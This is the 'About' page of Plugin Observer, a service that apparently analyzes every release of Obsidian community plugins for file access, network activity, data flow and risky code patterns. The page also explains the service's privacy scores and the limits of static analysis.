About — Obsidian Plugin Observer

Obsidian reviews plugins once. We review every update.

When a plugin is first submitted, the Obsidian team reviews the code. After that, every update ships directly to your vault without review. Plugin Observer analyzes every version of every plugin so you can see what changed.

Are Obsidian plugins safe?

Obsidian plugins run without a sandbox — they can access any file on your computer, not just your vault. There is no permission system that limits what a plugin can do. This is a known limitation of the platform, not a secret.

Plugin Observer exists to make that risk visible. We analyze every plugin's code and show you exactly what it accesses, where it sends data, and whether its behavior has changed between versions.

Do you review plugin updates?

Yes. Every version of every community plugin is analyzed when it ships. Each release is compared against the previous version so changes are visible before you update.

The pipeline diagram below shows what happens each time a plugin publishes a new release.

Submit

Developer submits plugin to registry

→

Review

Manual code review (once)

→

Approved

Plugin listed in community

→

Updates

All future updates ship unreviewed

→

Observer

Automated analysis of every version

Do you analyze the actual code users install?

Yes. We analyze the built JavaScript that gets installed on your machine, not just the source code on GitHub. This matters because the two can differ — a plugin's GitHub repository might look clean while the published release contains different or additional code.

When we reproduce a build from source and compare it to the published release, there are three possible outcomes: the build matches, the build differs (a red flag), or the build is unverifiable. Unverifiable means the build output differs from the release, but the plugin has no lockfile. Without a lockfile, dependency versions may have drifted since the release was built, making it impossible to determine whether the difference is from dependency drift or intentional tampering.

What does Plugin Observer actually check?

Four areas:

Vault Access

Which of your files the plugin reads from your vault

Network Activity

Where data gets sent (which hosts, which protocols)

Data Flow

Whether your notes actually reach network endpoints

Code Patterns

Risky patterns like dynamic code execution, obfuscation, or known-vulnerable dependencies. We distinguish between patterns that are legitimate user-facing features (like eval() for custom queries) and patterns that could indicate malicious behavior (like eval() executing code fetched from the network).

What do the scores mean?

Each plugin gets a privacy score from 0 to 100. The score reflects how the plugin handles your data — not its quality, usefulness, or the developer's intent.

A plugin that sends your notes to a cloud API will score lower than one that works entirely offline, even if both are well-written and legitimate. The score is a transparency tool: it tells you what's happening with your data so you can make an informed choice.

For the full methodology — privacy levels, scoring factors, and how confidence works — see How Scoring Works.

Has a malicious plugin ever been found?

The Obsidian team has disabled 7 plugin versions and 2 entire plugins — all for data corruption or data loss, not malicious behavior. No confirmed malicious plugin has been discovered in the community registry yet.

But the absence of a known incident doesn't mean the risk isn't real. Updates ship without review, plugins have full system access, and dependencies can be compromised upstream. Plugin Observer's automated analysis means changes are flagged as soon as they ship.

What about AI-generated plugins?

Our analysis catches the same patterns regardless of whether code was written by a human or generated by AI. Poorly-written plugins — whether vibe-coded or not — are more likely to trigger findings for unnecessary network calls, excessive dependencies, or unsafe patterns.

More plugins are being generated by AI, and authors don't always understand the code they ship. That makes automated review more useful, not less.

I use Obsidian at work. Should I be worried?

If you use community plugins on a work computer, your IT department should know. Plugins can access files beyond your vault — they run with the same permissions as Obsidian itself, which means anything on your filesystem.

Plugin Observer can help you and your IT team evaluate which plugins are appropriate for your environment. Each plugin's detail page shows exactly what it accesses and where it sends data.

Does a low score mean a plugin is malicious?

No. A low score means the plugin demonstrates confirmed behaviors that could compromise your data — like sending vault contents to hardcoded external servers. Having capabilities alone (like a configurable API endpoint) doesn't tank a score. Many useful plugins legitimately need network access — AI assistants, sync tools, translation services, publishing workflows.

The score helps you understand what a plugin does with your data, not whether the developer has bad intentions.

Can Plugin Observer detect all security issues?

No. We use static analysis — we examine code without running it. We can identify patterns and data flows, but we cannot catch every possible runtime behavior or detect threats that only manifest under specific conditions.

Plugin Observer gives you more information than you'd otherwise have, but it doesn't replace good judgment about which plugins you install.